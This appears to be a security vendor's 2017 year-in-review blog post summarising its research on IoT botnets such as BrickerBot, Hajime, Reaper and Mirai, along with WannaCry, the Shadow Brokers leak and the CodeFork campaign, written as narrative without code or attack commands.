As 2017 comes to a close, we decided to take a look back at a number of new attack types and threats that we saw throughout the year. Our team took a deep dive into researching and testing many of these threats to find out how they operate and how big of a threat they really were, through setting up honeypots, intentionally bricking a colleague’s device, and setting up IoT chatbots. Below are some of the highlights from our year:
Once dangerous tools are released to the public, they can be downloaded—and modified and enhanced—by anyone. Radware performed a quick test to see how easy or difficult it would be for an average hacker to take the now open-sourced Mirai source code and extend its capabilities with a new, advanced attack vector.
On April 5th, Radware’s Pascal Geenens released the results of his research from over a four-day period, where our honeypot recorded 1,895 Permanent Denial of Service (PDoS) attack attempts performed from several locations around the world. He coined the term “Brickerbot” for this new threat. About a week after the initial discovery of Brickerbot, Pascal offered his thoughts on who was being targeted and why. He also recorded the results of a “brick test” done on a camera belonging to one of our security evangelists.
A new version of the BrickerBot PDoS attack was discovered (BrickerBot.3) with a new command sequence on a different honeypot location. Around this time, the author of Brickerbot also came forward to identify himself and make some statements about the purpose and creation of Brickerbot.
Radware decided to conduct further research into how Brickerbot works. Using one of the more recently discovered BrickerBot source IP addresses at the time, we performed a TCP connection test on port TCP/23.
Lost amid all the headlines about Brickerbot was another IoT threat, known as Hajime. Unlike Brickerbot, the intentions and author of this botnet were unknown and it was the subject of much research by those who wanted to know what kind of threat they were dealing with. In a timespan of a little over five weeks, we counted almost 15,000 infection attempts from more than 12,000 unique IPs.
In late October, months after Brickerbot had begun to fade from the spotlight, a new IoT threat formed, known as Reaper. Many thought this botnet could rival Mirai and were calling it potentially one of the most dangerous threats seen. Pascal took a look at how this threat compared to Mirai and the kinds of vulnerabilities that were being exploited.
On Friday, May 12th a global incident related to a ransomware variant named WannaCry broke out, targeting computers around the world. The campaign spread across networks leveraging a recently disclosed vulnerability in Microsoft SMB service. A month later the Shadow Brokers, a hacking group that targets the NSA, leaked hacking tools from the Equation Group.
After the Dyn attack by Mirai in October 2016, we knew we were facing a threat that would reshape the DDoS threat landscape. Early January was the time we started to deploy some sensors to get a feel of how bad it actually was. While tracking initial connections, we found that there was less than 10 minutes between any two connections from bots trying to compromise our node. Given this regular activity, we set out to create a chatbot which would have a meaningful dialog with the bots, with the goal to trigger them to reveal their malware binary.
Last but not least is a campaign by hacktivist group CodeFork. As a result of Radware’s acquisition of Seculert, Radware has expanded its research capabilities to include malware intelligence. For two years, the team had been following CodeFork, who launched a new campaign with updated malware tools and infection techniques. Using file-less techniques for persistence, the tool was capable of sneaking under the radar of traditional defense systems.